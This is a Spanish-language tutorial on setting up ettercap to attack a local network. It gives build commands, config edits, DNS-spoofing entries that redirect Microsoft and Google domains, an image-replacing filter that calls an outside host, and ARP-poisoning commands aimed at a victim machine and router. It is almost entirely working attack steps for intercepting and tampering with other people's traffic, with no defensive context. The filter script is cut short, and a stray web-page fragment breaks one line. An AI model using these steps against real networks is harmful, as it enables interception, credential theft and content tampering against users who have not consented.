ettercap
[Dependencias: libcap2 libnet1 zlib1g libpthread-stubs0 libpcre3-dev libpcap-dev libcap-dev libnet6-1.3-0 libnet1-dev libssl-dev ncurses-bin libncurses5-dev libsdl-pango1 libatk1.0-dev]
Snifador de red. Muestra pantallas solicitando aceptación de certificado en los navegadores de las victimas.
descargar de http://ettercap.sourceforge.net/ y descomprimir
$ wget http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download
$ wget http://sourceforge.net/projects/ettercap/files/ettercap/NG-0.7.3/ettercap-NG-0.7.3.tar.gz/download
$ tar -zvxf paquete
$ cd ettercap-NG-0.7.3
$ ./configure
$ make
# make install
$ ettercap -P list
modificar archivo de configuración:
# nano /etc/etter.conf
descomentar la linea:himne20-01-13 19:37Menos información
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Y modificar:
# the command used by the remote_browser plugin
remote_browser = "firefox -remote openurl(http://%host%url)"
Para usar el plugin dns_spoof (Redireccionar páginas a otros sitios)
# nano /usr/share/ettercap/etter.dns
# 3 Modos de especificar la redirección a localhost
microsoft.com A 192.168.1.2
*.microsoft.com A 192.168.1.2
*google* A 192.168.1.2
Para la sustitución de imagenes:
# touch test2filter
Pegar:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter ok.\n");
Configurar el sistema para que acepte todos los paquetes que detecte. Si al lanzar:
# cat /proc/sys/net/ipv4/ip_forward
Si la respuesta no es 1, lanzar:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Arrancar la aplicación en ncurses [en terminal -> ettercap -T , en modo gtk -> ettercap -G y en modo demonio -> ettercap -D . En este último caso el análisis se realiza en los archivos de log]:
# ettercap -C
Clicar en:
Sniff -> Unifield sniffing
Y aceptar [o poner] la red [eth0]. En la nueva pantalla, clic en:
Host -> Scan for host
Para escanear la red. Para visionar las máquina activas obtenidas, clic en:
Hosts -> Hosts List
Bajar con el cursor hasta la IP del router y pulsar la tecla "1". Luego nos situamos sobre la IP del objetivo y pulsar la tecla "2" con lo que colocamos nuestra máquina entre el router y la máquina objetivo (envenenamiento arp). Luego en el cuadro que se abre con:
Mitm -> Arp poisoning
Parameters, ponemos:
remote
Y arrancamos el sniffer:
Start -> Start sniffing
Para observar las conexiones que realiza la máquina objetivo:
View -> Connections
Para terminar el ataque:
Mitm -> Stop mitm atack
Start -> Stop Sniffing
Start -> Exit
Forma abreviada:
# ettercap -Tq -M arp:remote -i eth0 ip_victima ip_router
O solo especificando la del router si se ataca toda la red:
# ettercap -Tq -M arp:remote -i eth0 ip_router